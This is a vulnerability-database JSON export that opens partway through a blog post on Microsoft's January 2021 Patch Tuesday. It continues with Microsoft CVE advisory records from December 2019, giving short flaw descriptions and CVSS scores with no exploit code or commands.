nearly every version of Windows that earned a [CVSS score](<https://www.first.org/cvss/>) of 8.8 (10 is the most dangerous).\n\n&quot;They classify this vulnerability as &#x27;low&#x27; in complexity, meaning an attack could be easy to reproduce,&quot; Breen said. &quot;However, they also note that it\u2019s &#x27;less likely&#x27; to be exploited, which seems counterintuitive. Without full context of this vulnerability, we have to rely on Microsoft to make the decision for us.&quot;\n\nCVE-2020-1660 is actually just one of five bugs in a core Microsoft service called **Remote Procedure Call** (RPC), which is responsible for a lot of heavy lifting in Windows. Some of the more memorable computer worms of the last decade spread automatically by exploiting RPC vulnerabilities.\n\n**Allan Liska**, senior security architect at **Recorded Future**, said while it is concerning that so many vulnerabilities around the same component were released simultaneously, two previous vulnerabilities in RPC -- [CVE-2019-1409](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1409>) and [CVE-2018-8514](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2018-8514>) -- were not widely exploited.\n\nThe remaining 70 or so flaws patched this month earned Microsoft&#x27;s less-dire &quot;important&quot; ratings, which is not to say they&#x27;re much less of a security concern. Case in point: [CVE-2021-1709](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1709>), which is an &quot;elevation of privilege&quot; flaw in Windows 8 through 10 and Windows Server 2008 through 2019.\n\n&quot;Unfortunately, this type of vulnerability is often quickly exploited by attackers,&quot; Liska said. &quot;For example, [CVE-2019-1458](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1458>) was announced on December 10th of 2019, and by December 19th an attacker was seen selling an exploit for the vulnerability on underground markets. So, while CVE-2021-1709 is only rated as [an information exposure flaw] by Microsoft it should be prioritized for patching.&quot;\n\n**Trend Micro&#x27;s ZDI Initiative** pointed out another flaw marked &quot;important&quot; -- [CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>), an elevation of privilege bug in Windows 8, 10 and some Windows Server 2012 and 2019 that was publicly disclosed by ZDI prior to today.\n\n&quot;It was also discovered by Google likely because this patch corrects a bug introduced by a previous patch,&quot; ZDI&#x27;s **Dustin Childs** said. &quot;The previous CVE was being exploited in the wild, so it\u2019s within reason to think this CVE will be actively exploited as well.\u201d\n\nSeparately, Adobe released security updates to tackle at least eight vulnerabilities [across a range of products](<https://blogs.adobe.com/psirt/?p=1960>), including **Adobe Photoshop** and **Illustrator**. There are no **Flash Player** updates because Adobe retired the browser plugin in December (hallelujah!), and Microsoft&#x27;s update cycle from last month removed the program from Microsoft&#x27;s browsers.\n\nWindows 10 users should be aware that the operating system will download updates and install them all at once on its own schedule, closing out active programs and rebooting the system. If you wish to ensure Windows has been set to pause updating so you have ample opportunity to back up your files and/or system, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nPlease back up your system before applying any of these updates. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. You never know when a patch roll-up will bork your system or possibly damage important files. For those seeking more flexible and full-featured backup options (including incremental backups), [Acronis](<https://www.acronis.com/en-us/products/true-image/>) and [Macrium](<https://www.macrium.com/>) are two that I&#x27;ve used previously and are worth a look.\n\nThat said, there don&#x27;t appear to be any major issues cropping up yet with this month&#x27;s update batch. But before you apply updates consider paying a visit to [AskWoody.com](<https://www.askwoody.com/category/microsoft-windows-patches-security/>), which usually has the skinny on any reports about problematic patches.\n\nAs always, if you experience glitches or issues installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-13T01:32:20", "type": "krebs", "title": "Microsoft Patch Tuesday, January 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8514", "CVE-2019-1409", "CVE-2019-1458", "CVE-2020-1660", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1660", "CVE-2021-1709"], "modified": "2021-01-13T01:32:20", "id": "KREBS:B3F20C0C41C613971FDADBAE93382CDF", "href": "https://krebsonsecurity.com/2021/01/microsoft-patch-tuesday-january-2021-edition/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-06-14T15:27:28", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1474"], "modified": "2019-12-11T08:00:00", "id": "MS:CVE-2019-1474", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1474", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-14T15:27:28", "description": "An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1465"], "modified": "2019-12-23T08:00:00", "id": "MS:CVE-2019-1465", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1465", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-14T15:27:28", "description": "An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker on a guest operating system could run a specially crafted application that could cause the Hyper-V host operating system to disclose memory information.\n\nAn attacker who successfully exploited the vulnerability could gain access to information on the Hyper-V host operating system.\n\nThe security update addresses the vulnerability by correcting how Hyper-V validates guest operating system user input.\n", "cvss3": {"exploitabilityScore": 1.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 6.0, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Windows Hyper-V Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1470"], "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1470", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1470", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-06-14T15:27:27", "description": "An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1467"], "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1467", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1467", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-14T15:27:27", "description": "An information disclosure vulnerability exists when the win32k component improperly provides kernel information. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application.\n\nThe security update addresses the vulnerability by correcting how win32k handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Win32k Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1469"], "modified": "2020-07-23T07:00:00", "id": "MS:CVE-2019-1469", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1469", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-14T15:27:28", "description": "A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RDP service on the target system to stop responding.\n\nTo exploit this vulnerability, an attacker would need to run a specially crafted application against a server which provides Remote Desktop Protocol (RDP) services.\n\nThe update addresses the vulnerability by correcting how RDP handles connection requests.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1453"], "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1453", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1453", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-14T15:27:28", "description": "An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user\u2019s system.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n\nThe security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Windows GDI Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1466"], "modified": "2019-12-11T08:00:00", "id": "MS:CVE-2019-1466", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1466", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-14T15:27:27", "description": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nThere are multiple ways an attacker could exploit this vulnerability.\n\n * In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit this vulnerability and then convince a user to view the website. An attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an email message or in an Instant Messenger message that takes users to the attacker's website, or by opening an attachment sent through email.\n\n * In a file sharing attack scenario, an attacker could provide a specially crafted document file that is designed to exploit this vulnerability, and then convince a user to open the document file.\n\nThe security update addresses the vulnerability by correcting how the Windows font library handles embedded fonts.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Win32k Graphics Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1468"], "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1468", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1468", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:27:28", "description": "A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code.\n\nTo exploit the vulnerability, an attacker would have to convince a user to open a specially crafted file or a program, causing Windows to execute arbitrary code.\n\nThe update addresses the vulnerability by correcting how Windows OLE validates user input.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Windows OLE Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1484"], "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1484", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1484", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:27:28", "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how Win32k handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1458", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:27:27", "description": "A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked &quot;safe for initialization&quot; in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "VBScript Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1485"], "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1485", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1485", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:27:27", "description": "An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe security update addresses the vulnerability by correcting how Windows AppX Deployment Service handles hard links.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Windows Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1476"], "modified": "2019-12-10T08:00:00", "id": "MS:CVE-2019-1476", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1476", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:27:28", "description": "A security feature bypass vulnerability exists when Microsoft Defender improperly handles specific buffers. An attacker could exploit the vulnerability to trigger warnings and false positives when no threat is present.\n\nTo exploit the vulnerability, an attacker would first require execution permissions on the victim system.\n\nThe security update addresses the vulnerability by ensuring Microsoft Defender properly handles these buffers.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2019-12-10T08:00:00", "type": "mscve", "title": "Microsoft Defender Security Feature Bypass Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1488"], "modified": "2020-01-29T08:00:00", "id": "MS:CVE-2019-1488", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1488", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-14T15:27:28", "description": "An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this 